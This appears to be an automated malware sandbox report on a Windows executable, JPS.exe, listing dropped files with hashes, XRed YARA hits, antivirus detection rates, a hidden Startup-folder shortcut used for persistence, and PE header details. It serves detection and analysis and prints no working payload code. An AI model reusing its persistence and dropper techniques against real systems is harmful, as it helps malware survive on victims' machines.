                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="s7JVvA76stXex42ehCKVDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\xXunwBG.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.266904178812858
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+04wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Dw+pAZewRDK4mW
                                                                                                                                                      MD5:FCA7A5AB41D9FE8B3E20440ABC9FC02A
                                                                                                                                                      SHA1:569502D19D1713C4E43B70B21611F223221EC770
                                                                                                                                                      SHA-256:C25F020E3662ECFE4A9119B5125BE38D556C3902885339383CBB55C4D3D57582
                                                                                                                                                      SHA-512:9F215AB9F795D176AA3D250A0D68D5DF9332C99E6744DE7AB1DAED3926CB86385DF4D62D55062FB1C341860318431CB9BA12C2E80211F16EFA09D10CABD75323
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iAJihzPtLZs7Z8Kt84NDQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\xe33gSA.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257824225857048
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                                                                      MD5:AA38A75ECCA80F52D04F46ACCD2931F1
                                                                                                                                                      SHA1:9D75F0E428B3B4213AA30B741171C6DBFFC86469
                                                                                                                                                      SHA-256:FB544F9796C90B77C8870A5101D71E50EB90634DCA9F975AF514C11B677DCB93
                                                                                                                                                      SHA-512:056167C2001038B05F347E52EC467F957CD9B62963CF38FFAF4EBB0C743E58496FAA996C15DC3BE770537D09C115C6F96174AD20B03EFE377194AA10943E9D54
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QN7iH2Ti9ULeeLBP53pLnw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\zXSFDCi.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.253802683712044
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0FgDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+mgD+pAZewRDK4mW
                                                                                                                                                      MD5:773E3DBE307E4CB97B16ECE7CF651FCE
                                                                                                                                                      SHA1:A236CCB1D335E996F7112D789BCD223F36E89B7A
                                                                                                                                                      SHA-256:9BFFF3F7C59168CF0573A3019FB4D044D644F1ECC04245EADEADACE29737EBF5
                                                                                                                                                      SHA-512:FE7B66217FF956D4CA7D5BB991ADC0C7EA00E666872F7F18292D1ECC62409A04C0B22FE97161F87C7A53D87B28E29DE8C380C32647217936AF25FBF5DDDAD2E7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="b7o6_gIk5gb6GruMuhMIpA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~$J6UTCx7N.xlsm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.3801032810853697
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:UvNFiKVMNv:UvNsKVkv
                                                                                                                                                      MD5:9AA76EF018A0F672FA8DF9799D834C34
                                                                                                                                                      SHA1:75B4E1ADC263E4F966CAD3ECA3A2C84638CA525E
                                                                                                                                                      SHA-256:ED0F89EA4BAE07B1876B61240D06D56CDDB5CE83EF10E41F68142378CB750B77
                                                                                                                                                      SHA-512:6A8AF40C8225E60E652BCCB7D7E7FF03A8A014A7AC782D620AA6120B134213D4A4E279EF0005FCCBA513E85785E7CF6EA42422A6E936F4F690E47D0AAD11AA77
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.user ..t.o.t.t.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF0B86859D68F1F3D7.TMP

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\._cache_JPS.exe
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:25:21 2024, mtime=Mon Dec 30 09:25:21 2024, atime=Mon Dec 30 09:25:21 2024, length=1217536, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1805
                                                                                                                                                      Entropy (8bit):3.4171175826202704
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8GdbPfr2Ce2dkwHAzTwKE2+s9T4IlNNm:8GdbHrPhgzfr9MIlH
                                                                                                                                                      MD5:3DCE858FB3F04D0C2FC20F894BBE8150
                                                                                                                                                      SHA1:1E5A0ED8502A3DB8D918837CDC6D26BC880AFD84
                                                                                                                                                      SHA-256:79DFC580224DEC9C7D9951E7506C71846E466DC917961F24975D76E34867D35E
                                                                                                                                                      SHA-512:2207C8EE7E661E9915D7820A33255BDF845BB2F129327959B7D2CA39991C2244539937F2083D7B26E6D574207DD777A33D66A78A3B57BA592CB698DDFFD5FB5C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:L..................F.@.. .....1!.Z..P.A!.Z..P.A!.Z............................:..DG..Yr?.D..U..k0.&...&.......;..z........Z...,v!.Z......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y(S..........................B...A.p.p.D.a.t.a...B.V.1......Y&S..Roaming.@......EW.V.Y&S...........................3.R.o.a.m.i.n.g.....V.1......Y*S..Windata.@......Y*S.Y*S....(.......................1.W.i.n.d.a.t.a.....`.2......Y+S .XNLAGO.exe..F......Y+S.Y+S....T.........................X.N.L.A.G.O...e.x.e.......`...............-......._............T.a.....C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.X.N.L.A.G.O...e.x.e.).".C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...............................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\._cache_JPS.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1217536
                                                                                                                                                      Entropy (8bit):6.928149757710278
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:DXe9PPlowWX0t6mOQwg1Qd15CcYk0We15Ue7Okfn0ik9Ya0xMYPLAtF5WyNn2fQ6:qhloDX0XOf44e7JFtxAnWe2fxYBQ
                                                                                                                                                      MD5:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      SHA1:CE7D9083A3A7A5A7F627CF1CDC4946756DF3AAA9
                                                                                                                                                      SHA-256:7DF6C8D2B3479312E1E8BF177D58E7F69C11B932177F288C0FC0D2AEE2F869D7
                                                                                                                                                      SHA-512:A27903F33A6B7B6B003EE5CB80B7FF640EF24D1CA635CE79D15DE94F69E6B2BDC8CA3E6E699F130BBC9E6D629312CC48216624A6110CAA068C532AA9133646E2
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...+.cg.........."......P...P...p..@.............@.......................... (...........@...@.......@.......................(.$........G..................0.(.....................................$...H...........................................UPX0.....p..............................UPX1.....P.......D..................@....rsrc....P.......L...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                                      C:\Users\user\Desktop\._cache_JPS.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1217536
                                                                                                                                                      Entropy (8bit):6.928149757710278
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:DXe9PPlowWX0t6mOQwg1Qd15CcYk0We15Ue7Okfn0ik9Ya0xMYPLAtF5WyNn2fQ6:qhloDX0XOf44e7JFtxAnWe2fxYBQ
                                                                                                                                                      MD5:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      SHA1:CE7D9083A3A7A5A7F627CF1CDC4946756DF3AAA9
                                                                                                                                                      SHA-256:7DF6C8D2B3479312E1E8BF177D58E7F69C11B932177F288C0FC0D2AEE2F869D7
                                                                                                                                                      SHA-512:A27903F33A6B7B6B003EE5CB80B7FF640EF24D1CA635CE79D15DE94F69E6B2BDC8CA3E6E699F130BBC9E6D629312CC48216624A6110CAA068C532AA9133646E2
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...+.cg.........."......P...P...p..@.............@.......................... (...........@...@.......@.......................(.$........G..................0.(.....................................$...H...........................................UPX0.....p..............................UPX1.....P.......D..................@....rsrc....P.......L...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                                      C:\Users\user\Documents\AFWAAFRXKO.xlsm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):18387
                                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                      C:\Users\user\Documents\~$AFWAAFRXKO.xlsx

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.3801032810853697
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:UvNFiKVMNv:UvNsKVkv
                                                                                                                                                      MD5:9AA76EF018A0F672FA8DF9799D834C34
                                                                                                                                                      SHA1:75B4E1ADC263E4F966CAD3ECA3A2C84638CA525E
                                                                                                                                                      SHA-256:ED0F89EA4BAE07B1876B61240D06D56CDDB5CE83EF10E41F68142378CB750B77
                                                                                                                                                      SHA-512:6A8AF40C8225E60E652BCCB7D7E7FF03A8A014A7AC782D620AA6120B134213D4A4E279EF0005FCCBA513E85785E7CF6EA42422A6E936F4F690E47D0AAD11AA77
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.user ..t.o.t.t.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      C:\Users\user\Documents\~$cache1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):771584
                                                                                                                                                      Entropy (8bit):6.632480030468604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9n
                                                                                                                                                      MD5:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      SHA1:F44DA6758D62D39C9F96E18763DCA6FC858385EF
                                                                                                                                                      SHA-256:634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                                                                                                                                      SHA-512:B8B07692BF6770D1F67F5A9CCE809F9B20EDCA21E7480151D0FA35AC1CFC61CBA5953B0475CAAA3C4892860C0CEE287E689E50FC1727CE9533FD87A85DA820B4
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                      Entropy (8bit):4.298825706779003
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:hECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lISD6VJSRxL:2CsL6seqD5S9SWVARx
                                                                                                                                                      MD5:399355DE8F482DA9C9052871F7D6B35C
                                                                                                                                                      SHA1:734984296D4564B48D8451ADB58F247BA69A1A18
                                                                                                                                                      SHA-256:47015DC02540147B5AAFA4C3789C7F11007BC2CF2FB3A45D369092F4865F72A0
                                                                                                                                                      SHA-512:9ADC967F38E2158AEC48F210E3853B0B4AD95BA10087AA6656ECF9DD0941C635663B818F3C7E095252B7526CEA6E0156F9D2751BEAD4CBB31F9B120C17BDEDA0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmn..6.Z..............................................................................................................................................................................................................................................................................................................................................m...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                                                      • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                                                      • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                                      File name:JPS.exe
                                                                                                                                                      File size:1'989'120 bytes
                                                                                                                                                      MD5:290a46d2614f4ce4f7ad75d2cea2ce23
                                                                                                                                                      SHA1:cc9f762b21f649252881087b2ff56e88d4b5a6f1
                                                                                                                                                      SHA256:7cbe965fa1278ba09c31e191c19ac1e2b52f940b656273872c805833ae03e276
                                                                                                                                                      SHA512:2a6d87585971cf166d4df1b2bcfe80a8b066d1cf4cbf646addf0735b62644ab5d9624b635aa1ba89b0b36107fd2899bec2f95d6a55d2faff579272e1e758fe98
                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      TLSH:8595D022F2919C37D1325A399C5BA3B5583EBE532E34694A7BE43F4C4E3D2412BD4293
                                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:c338dad2da985006

                                                                                                                                                      Static PE Info

                                                                                                                                                      General

                                                                                                                                                      Entrypoint:0x49ab80
                                                                                                                                                      Entrypoint Section:CODE
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                      DLL Characteristics:
                                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                                                      Entrypoint Preview

                                                                                                                                                      Instruction
                                                                                                                                                      push ebp
                                                                                                                                                      mov ebp, esp
                                                                                                                                                      add esp, FFFFFFF0h
                                                                                                                                                      mov eax, 0049A778h
                                                                                                                                                      call 00007F04C4C6BBBDh
                                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                      call 00007F04C4CBF505h
                                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                      mov edx, 0049ABE0h
                                                                                                                                                      call 00007F04C4CBF104h
                                                                                                                                                      mov ecx, dword ptr [0049DBDCh]
                                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                      mov edx, dword ptr [00496590h]
                                                                                                                                                      call 00007F04C4CBF4F4h
                                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                      call 00007F04C4CBF568h
                                                                                                                                                      call 00007F04C4C6969Bh
                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                      Data Directories

                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x13b130.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                      Sections

                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                      BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                      .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                      .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                      .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0xb00000x13b1300x13b20083c0f5a87bc51105ad0d711ed6e2629bFalse0.6873380788873463data6.883262483410263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                                                      Resources

                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
